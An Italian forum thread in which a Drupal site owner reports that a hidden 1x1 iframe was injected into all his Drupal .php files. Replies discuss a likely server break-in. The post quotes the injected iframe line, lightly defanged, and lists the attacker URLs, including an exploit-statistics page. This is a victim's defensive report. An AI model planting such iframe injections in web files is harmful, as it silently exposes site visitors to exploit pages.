Grave problema di sicurezza
Questa mattina non riuscivo più ad accedere al mio sito, mi veniva indicato un errore nella file index.php, dopo aver sistemato il problema, questo stesso errore lo ho ritrovato anche nel file setting.php.
A questi due file è stata aggiunta in fondo la seguente riga:
(!--start_frame--//)(iframe src="http://choose-freedom.info/it/index.html" width="1" height="1")(/iframe)(!--end_frame--//)
Le parentesi tonde le ho messe al posto di <> perchè altrimenti non riuscivo a far vedere il codice.
Attenzione che non sono certo stato io ad inserirla!!!
Ho cercato di scoprire cosa faceva quella pagina; in pratica mi rimanda alla pagina
http://choose-freedom.info/new/index.html
che contine uno script che non riesco a decifrare ma non mi sembra prometta nulla di buono e poi rimanda ad un'altra pagina
http://choose-freedom.info/new/stat/sploit_stat.php
che contiene un altro script:
(script language="JavaScript")window.status="_fuck_you_bitch0";(/script)
Non so cosa voglia dire "bitch" ma "fuck you" invece si!!!
E' capitato ad altri?
Come è stato possibile?
E' un sito che ho appena cominciato a scrivere, l'unico utente è il primo amministratore.
Uso Drupal 4.7.3
Grazie, Lorenzo

Risposte
Ho scoperto che in tutti i
Ho scoperto che in tutti i file .php di drupal, compresi quelli nei temi, è stata aggiunta la riga indicata nel precedente post.
Ora la ho rimossa completamente ma chi ha idea di come sia stato possibile?
Grazie, Lorenzo
Qualcuno ha modificato i
Qualcuno ha modificato i files, quindi qualcuno è riuscito ad entrare nel server credo...
Hai informato del problema chi ti offre l'hosting?
La cosa strana è che sono
La cosa strana è che sono stati modificati tutti i file .php di drupal e sue sottocartelle mentre non è successo nulla agli altri file .php che sono presenti sul server che ci ospita.
Lorenzo